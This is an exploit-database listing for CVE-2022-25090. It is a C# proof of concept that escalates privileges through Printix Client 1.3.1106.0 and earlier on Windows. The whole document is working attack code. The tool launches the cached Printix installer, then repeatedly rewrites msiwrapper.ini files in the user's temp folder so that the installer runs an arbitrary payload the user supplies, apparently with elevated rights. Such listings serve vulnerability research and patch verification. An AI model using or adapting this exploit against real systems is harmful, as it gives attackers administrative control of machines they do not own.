Share
## https://sploitus.com/exploit?id=PACKETSTORM:166242
# Exploit Title: Printix Client 1.3.1106.0 - Privilege Escalation  
# Date: 3/2/2022  
# Exploit Author: Logan Latvala  
# Vendor Homepage: https://printix.net  
# Software Link:  
https://software.printix.net/client/win/1.3.1106.0/PrintixClientWindows.zip  
# Version: <= 1.3.1106.0  
# Tested on: Windows 7, Windows 8, Windows 10, Windows 11  
# CVE : CVE-2022-25090  
# Github for project: https://github.com/ComparedArray/printix-CVE-2022-25090  
  
using System;  
using System.Runtime.InteropServices;  
using System.Drawing;  
  
using System.Reflection;  
using System.Threading;  
using System.IO;  
using System.Text;  
using System.Resources;  
using System.Diagnostics;  
  
//Assembly COM for transparent creation of the application.  
  
//End of Assembly COM For Transparent Creation usage.  
public class Program  
{  
//Initiator class for the program, the program starts on the main method.  
public static void Main(string[] args)  
{  
//Console.SetWindowSize(120,30);  
//Console.SetBufferSize(120,30);  
Console.ForegroundColor = ConsoleColor.Blue;  
Console.WriteLine("โ”Œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€");  
Console.WriteLine("โ”œ oo dP dP ");  
Console.ForegroundColor = ConsoleColor.Red;  
Console.WriteLine("โ”œ 88 88 ");  
Console.ForegroundColor = ConsoleColor.Green;  
Console.WriteLine("โ”œ dP 88d888b. .d8888b. d888888b d8888P .d8888b. 88d8b.d8b. 88d888b. ");  
Console.ForegroundColor = ConsoleColor.Blue;  
Console.WriteLine("โ”œ 88 88' `88 88' `88 .d8P' 88 88ooood8 88'`88'`88 88' `88 ");  
Console.ForegroundColor = ConsoleColor.Yellow;  
Console.WriteLine("โ”œ 88 88 88 88. .88 .Y8P 88 88. ... 88 88 88 88. .88 ");  
Console.ForegroundColor = ConsoleColor.Magenta;  
Console.WriteLine("โ”œ dP dP dP `88888P8 d888888P dP `88888P' dP dP dP 88Y888P' ");  
Console.WriteLine("โ”œ 88 ");  
Console.WriteLine("โ”œ dP ");  
Console.ForegroundColor = ConsoleColor.Blue;  
Console.Write("โ”œ For ");  
Console.ForegroundColor = ConsoleColor.Magenta;  
Console.Write("Printix ");  
Console.ForegroundColor = ConsoleColor.Blue;  
Console.Write("Services Designed By Logan Latvala\n");  
Console.WriteLine("โ””โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€");  
Thread.Sleep(3000);  
string filesH = "";  
Console.WriteLine("Drag and drop a payload onto this application for execution.");  
try  
{  
if (args[0]?.Length >0)  
{  
Console.WriteLine("File Added: " + args[0]);  
}  
  
}  
catch (Exception e)  
{  
Console.WriteLine("You\'re missing a file here, please ensure that you drag and drop a payload to execute.\n \n We'll print the error for you right here...\n \n");  
Console.ForegroundColor = ConsoleColor.Red;  
Console.WriteLine(e);  
Console.ReadLine();  
Environment.Exit(40);  
}  
  
  
Console.WriteLine("\n We're going to look for your printix installer, one moment...");  
string[] installerSearch = Directory.GetFiles(@"C:\windows\installer\", "*.msi", SearchOption.AllDirectories);  
  
double mCheck = 1.00;  
  
string trueInstaller = "";  
//Starts to enumerate window's installer directory for an author with the name of printix.  
foreach (string path in installerSearch)  
{  
Console.WriteLine("Searching Files: {0} / {1} Files", mCheck, installerSearch.Length);  
Console.WriteLine("Searching Files... " + (Math.Round((mCheck / installerSearch.Length) * 100)) + "% Done.");  
if (readFileProperties(path, "Printix"))  
{  
trueInstaller = path;  
Console.WriteLine("We've found your installer, we'll finish enumeration.");  
goto MGMA;  
}  
mCheck++;  
}  
//Flag for enumeration when the loop needs to exit, since it shouldn't loop infinitely.  
MGMA:  
if (trueInstaller == "")  
{  
Console.WriteLine("We can't find your installer, you are not vulnerable.");  
Thread.Sleep(2000);  
Environment.Exit(12);  
}  
Console.WriteLine("โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€");  
Console.WriteLine("โ”œ We are starting to enumerate your temporary directory.");  
Console.WriteLine("โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€");  
  
//Start a new thread here for enumeration.  
  
Thread t = new Thread(() => newTempThread(filesH, args));  
t.Start();  
  
  
  
Process.Start(trueInstaller);  
  
  
  
Console.WriteLine("All done.");  
Console.ReadLine();  
}  
public static void newTempThread(string filesH, string[] args)  
{  
while (true)  
{  
try  
{  
//Starts the inheriting process for printix, in which scans for the files and relays their contents.  
string[] files = Directory.GetFiles(@"C:\Users\" + Environment.UserName + @"\AppData\Local\Temp\", "msiwrapper.ini", SearchOption.AllDirectories);  
if (!string.IsNullOrEmpty(files[0]))  
{  
foreach (string fl in files)  
{  
if (!filesH.Contains(fl))  
{  
  
//filesH += " " + fl;  
string[] fileText = File.ReadAllLines(fl);  
int linerc = 0;  
foreach (string liners in fileText)  
{  
  
if (liners.Contains("SetupFileName"))  
{  
  
//Most likely the temporary directory for setup, which presents it properly.  
Console.WriteLine("โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€");  
Console.WriteLine("โ”œ " + fl);  
fileText[linerc] = @"SetupFileName=" + "\"" + args[0] + "\"";  
Console.WriteLine("โ”œ " + fileText[linerc] + "");  
Console.WriteLine("โ”œโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€");  
Console.WriteLine("โ”‚");  
filesH += " " + fl;  
  
File.WriteAllText(fl, string.Empty);  
File.WriteAllLines(fl, fileText);  
}  
linerc++;  
}  
}  
}  
}  
}  
catch (Exception e) { Console.WriteLine("There was an error, try re-running the program. \n" + e); Console.ReadLine(); }  
  
Thread.Sleep(20);  
}  
}  
public static bool readFileProperties(string file, string filter)  
{  
System.Diagnostics.Process process = new System.Diagnostics.Process();  
System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();  
startInfo.UseShellExecute = false;  
startInfo.RedirectStandardOutput = true;  
startInfo.FileName = "CMD.exe";  
startInfo.Arguments = "/c PowerShell -Command \"$FilePath='" + file + "'; Write-Host ((New-Object -COMObject Shell.Application).NameSpace((Split-Path -Parent -Path $FilePath))).ParseName((Split-Path -Leaf -Path $FilePath)).ExtendedProperty('System.Author')\"";  
process.StartInfo = startInfo;  
process.Start();  
string output = process.StandardOutput.ReadToEnd();  
process.WaitForExit();  
if (output.Contains(filter)) { return true; }  
else { return false; }  
//wmic datafile where Name="F:\\ekojs.txt" get Description,Path,Status,Version  
}  
}